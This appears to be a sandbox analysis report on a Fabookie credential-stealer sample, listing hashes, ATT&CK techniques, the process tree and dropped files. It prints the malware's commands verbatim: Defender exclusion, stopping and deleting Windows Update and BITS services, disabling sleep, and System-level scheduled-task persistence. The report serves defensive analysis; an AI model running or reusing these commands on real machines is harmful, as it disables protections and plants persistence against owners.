fabookie | 1adda3b870c28e6ae33226565b2f31ebfed65adf7a530a883404021104714746

Analysis

max time kernel
78s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2023 02:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
Size

4.2MB
MD5

4179238c49a009468a87403bc51a3d48
SHA1

4ba7cab7aafd77a37a2352abe7216e8f30c588a5
SHA256

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530a883404021104714746
SHA512

73328b77b3be07c082e15fbb9882e678ab757a31563ba4614a0d0ff5b362d503fac6588278b7d50f2383187d733cbc804b9700b6a26e4d345f07b65dbd73081b
SSDEEP

98304:295Xve/N7hR1j+Y5+5qBONF+Slju5IhZza8GzAZ2DIv9zMA4q3pGUOW3slcPcYJJ:+5XvOLl+Y5i4OuKjW4BJZVhMA4q3pGUP

Score

10^/10

fabookie evasion spyware stealer

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1168-176-0x00000000032F0000-0x0000000003421000-memory.dmp	family_fabookie
behavioral2/memory/1168-178-0x00000000032F0000-0x0000000003421000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

XandETC.exe

description	pid	process	target process
PID 2556 created 3112	2556	XandETC.exe	Explorer.EXE
PID 2556 created 3112	2556	XandETC.exe	Explorer.EXE
PID 2556 created 3112	2556	XandETC.exe	Explorer.EXE
PID 2556 created 3112	2556	XandETC.exe	Explorer.EXE
PID 2556 created 3112	2556	XandETC.exe	Explorer.EXE

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exeoldplayer.exeoneetx.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	oldplayer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 6 IoCs

Processes:

aafg31.exeoldplayer.exeXandETC.exeoneetx.exeupdater.exeoneetx.exe

pid process

1168 aafg31.exe
4360 oldplayer.exe
2556 XandETC.exe
3332 oneetx.exe
4308 updater.exe
3352 oneetx.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Drops file in Program Files directory 1 IoCs

Processes:

XandETC.exe

description ioc process

File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3036 sc.exe
2052 sc.exe
2120 sc.exe
4924 sc.exe
3296 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4132 schtasks.exe

pid	process
1168	aafg31.exe
4360	oldplayer.exe
2556	XandETC.exe
3332	oneetx.exe
4308	updater.exe
3352	oneetx.exe

description	ioc	process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe

pid	process
3036	sc.exe
2052	sc.exe
2120	sc.exe
4924	sc.exe
3296	sc.exe

pid	process
4132	schtasks.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

XandETC.exepowershell.exepowershell.exepowershell.exe

pid	process
2556	XandETC.exe
2556	XandETC.exe
3700	powershell.exe
3700	powershell.exe
2556	XandETC.exe
2556	XandETC.exe
2556	XandETC.exe
2556	XandETC.exe
2556	XandETC.exe
2556	XandETC.exe
2392	powershell.exe
2392	powershell.exe
2556	XandETC.exe
2556	XandETC.exe
4888	powershell.exe
4888	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeShutdownPrivilege	4960	powercfg.exe
Token: SeCreatePagefilePrivilege	4960	powercfg.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2248	powercfg.exe
Token: SeCreatePagefilePrivilege	2248	powercfg.exe
Token: SeShutdownPrivilege	1452	powercfg.exe
Token: SeCreatePagefilePrivilege	1452	powercfg.exe
Token: SeShutdownPrivilege	1120	powercfg.exe
Token: SeCreatePagefilePrivilege	1120	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

oldplayer.exe

pid process

4360 oldplayer.exe

pid	process
4360	oldplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exeoldplayer.exeoneetx.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 5004 wrote to memory of 1168	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 5004 wrote to memory of 1168	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 5004 wrote to memory of 4360	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 5004 wrote to memory of 4360	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 5004 wrote to memory of 4360	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 5004 wrote to memory of 2556	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 5004 wrote to memory of 2556	5004	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 4360 wrote to memory of 3332	4360	oldplayer.exe	oneetx.exe
PID 4360 wrote to memory of 3332	4360	oldplayer.exe	oneetx.exe
PID 4360 wrote to memory of 3332	4360	oldplayer.exe	oneetx.exe
PID 3332 wrote to memory of 4132	3332	oneetx.exe	schtasks.exe
PID 3332 wrote to memory of 4132	3332	oneetx.exe	schtasks.exe
PID 3332 wrote to memory of 4132	3332	oneetx.exe	schtasks.exe
PID 3332 wrote to memory of 2028	3332	oneetx.exe	cmd.exe
PID 3332 wrote to memory of 2028	3332	oneetx.exe	cmd.exe
PID 3332 wrote to memory of 2028	3332	oneetx.exe	cmd.exe
PID 2028 wrote to memory of 4652	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 4652	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 4652	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 2524	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2524	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2524	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2124	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2124	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2124	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 828	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 828	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 828	2028	cmd.exe	cmd.exe
PID 2028 wrote to memory of 2808	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2808	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2808	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2648	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2648	2028	cmd.exe	cacls.exe
PID 2028 wrote to memory of 2648	2028	cmd.exe	cacls.exe
PID 1812 wrote to memory of 4960	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 4960	1812	cmd.exe	powercfg.exe
PID 1392 wrote to memory of 4924	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 4924	1392	cmd.exe	sc.exe
PID 1812 wrote to memory of 2248	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 2248	1812	cmd.exe	powercfg.exe
PID 1392 wrote to memory of 3296	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 3296	1392	cmd.exe	sc.exe
PID 1812 wrote to memory of 1452	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 1452	1812	cmd.exe	powercfg.exe
PID 1392 wrote to memory of 3036	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 3036	1392	cmd.exe	sc.exe
PID 1812 wrote to memory of 1120	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 1120	1812	cmd.exe	powercfg.exe
PID 1392 wrote to memory of 2052	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 2052	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 2120	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 2120	1392	cmd.exe	sc.exe
PID 1392 wrote to memory of 632	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 632	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 4432	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 4432	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1540	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1540	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1368	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1368	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 4908	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 4908	1392	cmd.exe	reg.exe
PID 4888 wrote to memory of 4940	4888	powershell.exe	schtasks.exe
PID 4888 wrote to memory of 4940	4888	powershell.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
"C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
3⤵
- Executes dropped EXE
PID:1168

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4360

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3332

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
5⤵
- Creates scheduled task(s)
PID:4132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:4652

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
6⤵
PID:2524

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
6⤵
PID:2124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:828

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
6⤵
PID:2808

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
6⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4924

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3296

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3036

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2052

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2120

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:632

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4432

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1540

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1368

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4908

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:4940

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:4308

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:3352

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Notepad\Chrome\updater.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
67bb457516f6409a4589ea2453b55b26

SHA1
57c6fc2374dd65b5963194f3a8cd077b01aa7457

SHA256
b49fafb6a20fbdc6aba2956aa53c7ec0c9a52b384fbffff3456f53a5286de2cc

SHA512
cbd483a48a8ac6ecd3457c6fdac72e03beb8837fa02c433347c356a8b34477aa997a942a09db934e51dfd34851365bf278b592784533a77d18a2aedd6a4c74ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgro5ujm.gyu.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
